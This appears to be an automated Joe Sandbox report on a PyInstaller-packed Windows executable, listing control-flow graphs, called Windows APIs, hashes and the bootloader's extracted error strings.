19095 7ff7102d8707 19084->19095 19085 7ff7102d870f 19086 7ff7102d9c58 __free_lconv_num 11 API calls 19085->19086 19088 7ff7102d855e 19086->19088 19087 7ff7102d8789 19089 7ff7102d9c58 __free_lconv_num 11 API calls 19087->19089 19088->19064 19089->19088 19090 7ff7102ddea8 _get_daylight 11 API calls 19090->19095 19091 7ff7102d8778 19093 7ff7102d87c0 11 API calls 19091->19093 19092 7ff7102df784 37 API calls 19092->19095 19094 7ff7102d8780 19093->19094 19097 7ff7102d9c58 __free_lconv_num 11 API calls 19094->19097 19095->19085 19095->19087 19095->19090 19095->19091 19095->19092 19096 7ff7102d87ac 19095->19096 19099 7ff7102d9c58 __free_lconv_num 11 API calls 19095->19099 19098 7ff7102d9c10 _isindst 17 API calls 19096->19098 19097->19085 19100 7ff7102d87be 19098->19100 19099->19095 19102 7ff7102e7e41 __crtLCMapStringW 19101->19102 19103 7ff7102e63fe 19102->19103 19104 7ff7102de278 6 API calls 19102->19104 19103->18725 19103->18727 19104->19103

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 7ff7102c1000-7ff7102c3536 call 7ff7102cf138 call 7ff7102cf140 call 7ff7102cbb70 call 7ff7102d4700 call 7ff7102d4794 call 7ff7102c33e0 14 7ff7102c3544-7ff7102c3566 call 7ff7102c18f0 0->14 15 7ff7102c3538-7ff7102c353f 0->15 21 7ff7102c3736-7ff7102c374c call 7ff7102c3f70 14->21 22 7ff7102c356c-7ff7102c3583 call 7ff7102c1bf0 14->22 16 7ff7102c371a-7ff7102c3735 call 7ff7102cb870 15->16 27 7ff7102c3785-7ff7102c379a call 7ff7102c25f0 21->27 28 7ff7102c374e-7ff7102c377b call 7ff7102c76a0 21->28 26 7ff7102c3588-7ff7102c35c1 22->26 29 7ff7102c3653-7ff7102c366d call 7ff7102c7e10 26->29 30 7ff7102c35c7-7ff7102c35cb 26->30 41 7ff7102c3712 27->41 45 7ff7102c379f-7ff7102c37be call 7ff7102c1bf0 28->45 46 7ff7102c377d-7ff7102c3780 call 7ff7102cf36c 28->46 42 7ff7102c366f-7ff7102c3675 29->42 43 7ff7102c3695-7ff7102c369c 29->43 33 7ff7102c3638-7ff7102c364d call 7ff7102c18e0 30->33 34 7ff7102c35cd-7ff7102c35e5 call 7ff7102d4560 30->34 33->29 33->30 50 7ff7102c35f2-7ff7102c360a call 7ff7102d4560 34->50 51 7ff7102c35e7-7ff7102c35eb 34->51 41->16 48 7ff7102c3682-7ff7102c3690 call 7ff7102d415c 42->48 49 7ff7102c3677-7ff7102c3680 42->49 53 7ff7102c36a2-7ff7102c36c0 call 7ff7102c7e10 call 7ff7102c7f80 43->53 54 7ff7102c3844-7ff7102c3863 call 7ff7102c3e90 43->54 61 7ff7102c37c1-7ff7102c37ca 45->61 46->27 48->43 49->48 66 7ff7102c3617-7ff7102c362f call 7ff7102d4560 50->66 67 7ff7102c360c-7ff7102c3610 50->67 51->50 79 7ff7102c380f-7ff7102c381e call 7ff7102c8400 53->79 80 7ff7102c36c6-7ff7102c36c9 53->80 69 7ff7102c3871-7ff7102c3882 call 7ff7102c1bf0 54->69 70 7ff7102c3865-7ff7102c386f call 7ff7102c3fe0 54->70 61->61 65 7ff7102c37cc-7ff7102c37e9 call 7ff7102c18f0 61->65 65->26 84 7ff7102c37ef-7ff7102c3800 call 7ff7102c25f0 65->84 66->33 85 7ff7102c3631 66->85 67->66 76 7ff7102c3887-7ff7102c38a1 call 7ff7102c86b0 69->76 70->76 93 7ff7102c38af-7ff7102c38c1 SetDllDirectoryW 76->93 94 7ff7102c38a3 76->94 91 7ff7102c3820 79->91 92 7ff7102c382c-7ff7102c382f call 7ff7102c7c40 79->92 80->79 86 7ff7102c36cf-7ff7102c36f6 call 7ff7102c1bf0 80->86 84->41 85->33 97 7ff7102c3805-7ff7102c380d call 7ff7102d415c 86->97 98 7ff7102c36fc-7ff7102c3703 call 7ff7102c25f0 86->98 91->92 103 7ff7102c3834-7ff7102c3836 92->103 100 7ff7102c38d0-7ff7102c38ec call 7ff7102c6560 call 7ff7102c6b00 93->100 101 7ff7102c38c3-7ff7102c38ca 93->101 94->93 97->76 107 7ff7102c3708-7ff7102c370a 98->107 118 7ff7102c3947-7ff7102c394a call 7ff7102c6510 100->118 119 7ff7102c38ee-7ff7102c38f4 100->119 101->100 104 7ff7102c3a50-7ff7102c3a58 101->104 103->76 110 7ff7102c3838 103->110 108 7ff7102c3a5a-7ff7102c3a77 PostMessageW GetMessageW 104->108 109 7ff7102c3a7d-7ff7102c3aaf call 7ff7102c33d0 call 7ff7102c3080 call 7ff7102c33a0 call 7ff7102c6780 call 7ff7102c6510 104->109 107->41 108->109 110->54 124 7ff7102c394f-7ff7102c3956 118->124 121 7ff7102c38f6-7ff7102c3903 call 7ff7102c65a0 119->121 122 7ff7102c390e-7ff7102c3918 call 7ff7102c6970 119->122 121->122 132 7ff7102c3905-7ff7102c390c 121->132 134 7ff7102c3923-7ff7102c3931 call 7ff7102c6cd0 122->134 135 7ff7102c391a-7ff7102c3921 122->135 124->104 129 7ff7102c395c-7ff7102c3966 call 7ff7102c30e0 124->129 129->107 141 7ff7102c396c-7ff7102c3980 call 7ff7102c83e0 129->141 137 7ff7102c393a-7ff7102c3942 call 7ff7102c2870 call 7ff7102c6780 132->137 134->124 146 7ff7102c3933 134->146 135->137 137->118 151 7ff7102c3982-7ff7102c399f PostMessageW GetMessageW 141->151 152 7ff7102c39a5-7ff7102c39e1 call 7ff7102c7f20 call 7ff7102c7fc0 call 7ff7102c6780 call 7ff7102c6510 call 7ff7102c7ec0 141->152 146->137 151->152 162 7ff7102c39e6-7ff7102c39e8 152->162 163 7ff7102c39ea-7ff7102c3a00 call 7ff7102c81f0 call 7ff7102c7ec0 162->163 164 7ff7102c3a3d-7ff7102c3a4b call 7ff7102c18a0 162->164 163->164 171 7ff7102c3a02-7ff7102c3a10 163->171 164->107 172 7ff7102c3a12-7ff7102c3a2c call 7ff7102c25f0 call 7ff7102c18a0 171->172 173 7ff7102c3a31-7ff7102c3a38 call 7ff7102c2870 171->173 172->107 173->164
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                  • API String ID: 514040917-585287483
                                                                                                                                                                                                  • Opcode ID: 775923453a712acf451f733b21357bad863ee7a2324b45427f12e736a4958b8f
                                                                                                                                                                                                  • Instruction ID: cca435bbda14adafb9fc625ea32514403f384e5e3c96569e3c00c80d3c286be6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 775923453a712acf451f733b21357bad863ee7a2324b45427f12e736a4958b8f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F19021A28E8291FA19FB20D6552F9EB51AF447A0FC48431DA5D437D6EF2CF65CC360

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 335 7ff7102e5c74-7ff7102e5ce7 call 7ff7102e59a8 338 7ff7102e5d01-7ff7102e5d0b call 7ff7102d7830 335->338 339 7ff7102e5ce9-7ff7102e5cf2 call 7ff7102d43d4 335->339 344 7ff7102e5d26-7ff7102e5d8f CreateFileW 338->344 345 7ff7102e5d0d-7ff7102e5d24 call 7ff7102d43d4 call 7ff7102d43f4 338->345 346 7ff7102e5cf5-7ff7102e5cfc call 7ff7102d43f4 339->346 348 7ff7102e5d91-7ff7102e5d97 344->348 349 7ff7102e5e0c-7ff7102e5e17 GetFileType 344->349 345->346 363 7ff7102e6042-7ff7102e6062 346->363 352 7ff7102e5dd9-7ff7102e5e07 GetLastError call 7ff7102d4368 348->352 353 7ff7102e5d99-7ff7102e5d9d 348->353 355 7ff7102e5e6a-7ff7102e5e71 349->355 356 7ff7102e5e19-7ff7102e5e54 GetLastError call 7ff7102d4368 CloseHandle 349->356 352->346 353->352 361 7ff7102e5d9f-7ff7102e5dd7 CreateFileW 353->361 359 7ff7102e5e73-7ff7102e5e77 355->359 360 7ff7102e5e79-7ff7102e5e7c 355->360 356->346 369 7ff7102e5e5a-7ff7102e5e65 call 7ff7102d43f4 356->369 366 7ff7102e5e82-7ff7102e5ed7 call 7ff7102d7748 359->366 360->366 367 7ff7102e5e7e 360->367 361->349 361->352 374 7ff7102e5ef6-7ff7102e5f27 call 7ff7102e5728 366->374 375 7ff7102e5ed9-7ff7102e5ee5 call 7ff7102e5bb0 366->375 367->366 369->346 380 7ff7102e5f2d-7ff7102e5f6f 374->380 381 7ff7102e5f29-7ff7102e5f2b 374->381 375->374 382 7ff7102e5ee7 375->382 384 7ff7102e5f91-7ff7102e5f9c 380->384 385 7ff7102e5f71-7ff7102e5f75 380->385 383 7ff7102e5ee9-7ff7102e5ef1 call 7ff7102d9dd0 381->383 382->383 383->363 388 7ff7102e6040 384->388 389 7ff7102e5fa2-7ff7102e5fa6 384->389 385->384 387 7ff7102e5f77-7ff7102e5f8c 385->387 387->384 388->363 389->388 391 7ff7102e5fac-7ff7102e5ff1 CloseHandle CreateFileW 389->391 392 7ff7102e5ff3-7ff7102e6021 GetLastError call 7ff7102d4368 call 7ff7102d7970 391->392 393 7ff7102e6026-7ff7102e603b 391->393 392->393 393->388
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                  • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                  • Instruction ID: 8aa53c75860bba3fa9c257e1e5a99d171ce34b3a74009042b355a960b361eed1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43C1E433B24E5186EB10DF68C4902AD7B61FB49BA8B411235DF1E67794DF38E559C320

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7A1B
                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7A9E
                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7ABD
                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7ACB
                                                                                                                                                                                                  • FindClose.KERNEL32(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7ADC
                                                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,00007FF7102C7EF9,00007FF7102C39E6), ref: 00007FF7102C7AE5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                                                  • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                  • Instruction ID: b54c1747e3f2ea37ddd525ee615bfaaa4371c2f43a82d816aff29c4889bda2d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC418D21A2CE4295EB20BB24E5545BEA761FB947B4FC00232D99D52794DF3CF64ECB20
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                  • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                  • Instruction ID: 685b96d5d7ad67f7eddb0fa77934927e8187ca659d535f332a28d34b347711cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF0C822A28A4186F7619B60B598366B750AB44778F844335D96E127D4CF7CF05C8A14
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1010374628-0
                                                                                                                                                                                                  • Opcode ID: 635691222d115479c28cfb2a7c5460ed6ba239ea5ddb69637bfcc6e4d3ccf923
                                                                                                                                                                                                  • Instruction ID: d2724f6ba6d06995308cd3ee675da1f64c5c3d1ef10cd0dab4e50eecf7c10335
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 635691222d115479c28cfb2a7c5460ed6ba239ea5ddb69637bfcc6e4d3ccf923
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F202C222B1EE8740FAA1BB15944067AEA81AF05BB0FC44639ED5D567D1DE3CFC498334

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 179 7ff7102c18f0-7ff7102c192b call 7ff7102c3f70 182 7ff7102c1bc1-7ff7102c1be5 call 7ff7102cb870 179->182 183 7ff7102c1931-7ff7102c1971 call 7ff7102c76a0 179->183 188 7ff7102c1977-7ff7102c1987 call 7ff7102cf9f4 183->188 189 7ff7102c1bae-7ff7102c1bb1 call 7ff7102cf36c 183->189 194 7ff7102c19a1-7ff7102c19bd call 7ff7102cf6bc 188->194 195 7ff7102c1989-7ff7102c199c call 7ff7102c2760 188->195 192 7ff7102c1bb6-7ff7102c1bbe 189->192 192->182 200 7ff7102c19bf-7ff7102c19d2 call 7ff7102c2760 194->200 201 7ff7102c19d7-7ff7102c19ec call 7ff7102d4154 194->201 195->189 200->189 206 7ff7102c1a06-7ff7102c1a87 call 7ff7102c1bf0 * 2 call 7ff7102cf9f4 201->206 207 7ff7102c19ee-7ff7102c1a01 call 7ff7102c2760 201->207 215 7ff7102c1a8c-7ff7102c1a9f call 7ff7102d4170 206->215 207->189 218 7ff7102c1aa1-7ff7102c1ab4 call 7ff7102c2760 215->218 219 7ff7102c1ab9-7ff7102c1ad2 call 7ff7102cf6bc 215->219 218->189 224 7ff7102c1ad4-7ff7102c1ae7 call 7ff7102c2760 219->224 225 7ff7102c1aec-7ff7102c1b08 call 7ff7102cf430 219->225 224->189 230 7ff7102c1b0a-7ff7102c1b16 call 7ff7102c25f0 225->230 231 7ff7102c1b1b-7ff7102c1b29 225->231 230->189 231->189 233 7ff7102c1b2f-7ff7102c1b3e 231->233 235 7ff7102c1b40-7ff7102c1b46 233->235 236 7ff7102c1b60-7ff7102c1b6f 235->236 237 7ff7102c1b48-7ff7102c1b55 235->237 236->236 238 7ff7102c1b71-7ff7102c1b7a 236->238 237->238 239 7ff7102c1b8f 238->239 240 7ff7102c1b7c-7ff7102c1b7f 238->240 241 7ff7102c1b91-7ff7102c1bac 239->241 240->239 242 7ff7102c1b81-7ff7102c1b84 240->242 241->189 241->235 242->239 243 7ff7102c1b86-7ff7102c1b89 242->243 243->239 244 7ff7102c1b8b-7ff7102c1b8d 243->244 244->241
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _fread_nolock$Message
                                                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                  • API String ID: 677216364-3497178890
                                                                                                                                                                                                  • Opcode ID: ca7681533d335b3149c99a7518be3735f09406e3e8687230da297a1087ab093f
                                                                                                                                                                                                  • Instruction ID: 007d373095b30d620df114ae9d0f47ca2be00f462190123030a4d5393fba77e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca7681533d335b3149c99a7518be3735f09406e3e8687230da297a1087ab093f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B271E571A28E8285EB21EB14D5513BAAB90FF457A4F904035E98D47799EE3CF94C8B20

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 245 7ff7102c15c0-7ff7102c15d1 246 7ff7102c15d3-7ff7102c15dc call 7ff7102c1050 245->246 247 7ff7102c15f7-7ff7102c1611 call 7ff7102c3f70 245->247 252 7ff7102c15ee-7ff7102c15f6 246->252 253 7ff7102c15de-7ff7102c15e9 call 7ff7102c25f0 246->253 254 7ff7102c1613-7ff7102c163a call 7ff7102c2760 247->254 255 7ff7102c163b-7ff7102c1655 call 7ff7102c3f70 247->255 253->252 261 7ff7102c1671-7ff7102c1688 call 7ff7102cf9f4 255->261 262 7ff7102c1657-7ff7102c166c call 7ff7102c25f0 255->262 268 7ff7102c168a-7ff7102c16a6 call 7ff7102c2760 261->268 269 7ff7102c16ab-7ff7102c16af 261->269 267 7ff7102c17c5-7ff7102c17c8 call 7ff7102cf36c 262->267 275 7ff7102c17cd-7ff7102c17df 267->275 279 7ff7102c17bd-7ff7102c17c0 call 7ff7102cf36c 268->279 272 7ff7102c16b1-7ff7102c16bd call 7ff7102c11f0 269->272 273 7ff7102c16c9-7ff7102c16e9 call 7ff7102d4170 269->273 280 7ff7102c16c2-7ff7102c16c4 272->280 281 7ff7102c170c-7ff7102c1717 273->281 282 7ff7102c16eb-7ff7102c1707 call 7ff7102c2760 273->282 279->267 280->279 285 7ff7102c17a6-7ff7102c17ae call 7ff7102d415c 281->285 286 7ff7102c171d-7ff7102c1726 281->286 290 7ff7102c17b3-7ff7102c17b8 282->290 285->290 289 7ff7102c1730-7ff7102c1752 call 7ff7102cf6bc 286->289 294 7ff7102c1785-7ff7102c178c 289->294 295 7ff7102c1754-7ff7102c176c call 7ff7102cfdfc 289->295 290->279 296 7ff7102c1793-7ff7102c179c call 7ff7102c2760 294->296 301 7ff7102c1775-7ff7102c1783 295->301 302 7ff7102c176e-7ff7102c1771 295->302 303 7ff7102c17a1 296->303 301->296 302->289 304 7ff7102c1773 302->304 303->285 304->303
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                  • API String ID: 2030045667-1550345328
                                                                                                                                                                                                  • Opcode ID: 1a81640d21f4a00f99a39b8f134718eb96faec9be1b4c5e9a219255c90d4bfe9
                                                                                                                                                                                                  • Instruction ID: 8475aaa157a9a7f543b3be7bb71394dce2c0d197e34b86e77540a7cc02f339be
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a81640d21f4a00f99a39b8f134718eb96faec9be1b4c5e9a219255c90d4bfe9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0351AE61B18E4392EA11BB11AA515BAEB60BF467B4FD44131EE0D07B96EF3CF54C8720

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                                                  • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                  • Instruction ID: 68137be278342e9e0bad040a3162552071a6033893bc3ec9c774368a11d067aa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA412032A18B8281EA21AB24F4552AAF7A1FB85370F904335E6AD477D5DF7CE4488B10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
